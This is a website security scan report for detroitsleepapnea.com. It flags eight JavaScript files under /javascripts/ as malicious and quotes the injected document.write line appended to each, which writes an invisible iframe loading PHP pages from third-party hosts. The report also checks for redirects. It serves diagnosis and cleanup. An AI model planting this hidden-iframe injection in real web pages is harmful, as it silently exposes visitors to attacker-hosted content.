Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=detroitsleepapnea.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://detroitsleepapnea.com/ | 200 OK Content-Length: 36564 Content-Type: text/html | clean |
http://www.page1forms.com/jquery/jquery.js | 200 OK Content-Length: 55807 Content-Type: text/javascript | clean |
http://www.page1forms.com/page1forms.js | 200 OK Content-Length: 20850 Content-Type: text/javascript | clean |
http://www.google.com/jsapi?key=AIzaSyDCV9yMmGrhl1w3kFBQLANM4f4tO5K8e3k | 200 OK Content-Length: 24580 Content-Type: text/javascript | clean |
http://detroitsleepapnea.com/javascripts/googlerss.js | 200 OK Content-Length: 2238 Content-Type: application/x-javascript | malicious |
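Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
google.load("feeds", "1") function rssdisplayer(divid, url, feedlimit, showoptions){ this.showoptions=showoptions || "" var feedpointer=new google.feeds.Feed(url) feedpointer.setNumEntries(feedlimit) document.write('<div id="'+divid+'">Loading feed...</div>') this.feedcontainer=document.getElementById(divid) var displayer=this feedpointer.load(function(r){displayer.formatoutput(r)}) } rssdisplayer.prototype.formatdate=funct [excerpt truncated]
Flagged statement, shown after the script's own code:
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
This statement writes a 200x150 iframe inside a div styled with opacity 0, so the frame is fetched from a third-party host without being visible to the visitor. The same statement follows the excerpt of every file marked malicious in this report, all of them under /javascripts/. That is consistent with one injection applied to the site's script files rather than with a fault in the libraries themselves. The report does not show how the files were modified, so restoring them from a known-good copy does not by itself close the entry point.
Antivirus reports: (the per-engine results table is not present in this capture)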
http://detroitsleepapnea.com/javascripts/prototype.js | 200 OK Content-Length: 96824 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
var Prototype = { Version: '1.5.1.1', Browser: { IE: !!(window.attachEvent && !window.opera), Opera: !!window.opera, WebKit: navigator.userAgent.indexOf('AppleWebKit/index.html') > -1, Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1 }, BrowserFeatures: { XPath: !!document.evaluate, ElementExtensions: !!window.HTMLElement, SpecificElementExtens [excerpt truncated]
Flagged statement, shown after the library code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/effects.js | 200 OK Content-Length: 38721 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
String.prototype.parseColor = function() { var color = '#'; if(this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if(this.slice(0,1) == '#') { if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if(this.length==7) color = this.toLowerCase(); } [excerpt truncated]
Flagged statement, shown after the library code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/glider.js | 200 OK Content-Length: 4581 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
Glider = Class.create(); Object.extend(Object.extend(Glider.prototype, Abstract.prototype), { initialize: function(wrapper, options){ this.scrolling = false; this.wrapper = $(wrapper); this.scroller = this.wrapper.down('div.scroller'); this.sections = this.wrapper.getElementsBySelector('div.section'); this.options = Object.extend({ duration: 1.0, frequency: 3 }, options || {}); this.sections.each( function(section, index) [excerpt truncated]
Flagged statement, shown after the script's own code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/lib.js | 200 OK Content-Length: 8325 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
function clearText(thefield) { if (thefield.defaultValue==thefield.value) { thefield.value = "" } } function replaceText(thefield) { if (thefield.value=="") { thefield.value = thefield.defaultValue } } function bnaOpen() { new Effect.Appear('closeBNA',{delay:.4}); new Effect.Fade('openBNA',{duration:.3}); new Effect.Appear('viewMoreBnA',{delay:.4}); new Effect.Fade('toggleBnA',{duration:.3}); new Effect.toggle('bnaHolder','blind' [excerpt truncated]
Flagged statement, shown after the script's own code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/lightbox.js | 200 OK Content-Length: 24330 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var overlayOpacity = 0.8; var animate = true; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(animate == true){ overlayDuration = 0.2; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; } else { overlayDuration = 0;< [excerpt truncated]
Flagged statement, shown after the script's own code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/swfobject.js | 200 OK Content-Length: 7377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Start of the file as served (excerpt, truncated by the scanner):
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 [excerpt truncated]
Flagged statement, shown after the library code (a hidden iframe written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
Antivirus reports: (the per-engine results table is not present in this capture)
http://detroitsleepapnea.com/javascripts/swfobject-ext.js | 200 OK Content-Length: 747 Content-Type: application/x-javascript | malicious |
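Malicious code - confirmed by antiviruses (see below)
File content as served (this file is short, so its own code appears complete here):
function sendEvent(typ,prm) { var movie = thisMovie("mpl") movie.sendEvent(typ,prm); }; function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1) { return window[movieName]; } else { return document[movieName]; } };
Flagged statements, shown after the script's own code (two hidden iframes written into the page):
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');
The two statements are identical except for the iframe source host. Two injected statements in one file may mean the file was modified on more than one occasion; the report itself does not establish this. Cleanup should check for every injected line, not only the one common to the other flagged files.
Antivirus reports: (the per-engine results table is not present in this capture)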
http://detroitsleepapnea.com/images/bna/d_josie.jpg | 200 OK Content-Length: 66539 Content-Type: image/jpeg | clean |
http://detroitsleepapnea.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
http://detroitsleepapnea.com/images/bna/d_larryh.jpg | 200 OK Content-Length: 63764 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: detroitsleepapnea.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:19:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 36564
Content-Type: text/html
...36564 bytes of data.
GET / HTTP/1.1
Host: detroitsleepapnea.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:19:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 36564
Content-Type: text/html
...36564 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: detroitsleepapnea.com
Referer: http://www.google.com/search?q=detroitsleepapnea.com
Result:
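The result is similar to the first query. There are no suspicious redirects found. This check compares HTTP responses only. The hidden iframes reported under "Scanned pages/files" are written into the page by the flagged scripts once they run in the browser, so they do not appear as redirects here.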
GET / HTTP/1.1
Host: detroitsleepapnea.com
Referer: http://www.google.com/search?q=detroitsleepapnea.com
Result:
The result is similar to the first query. There are no suspicious redirects found.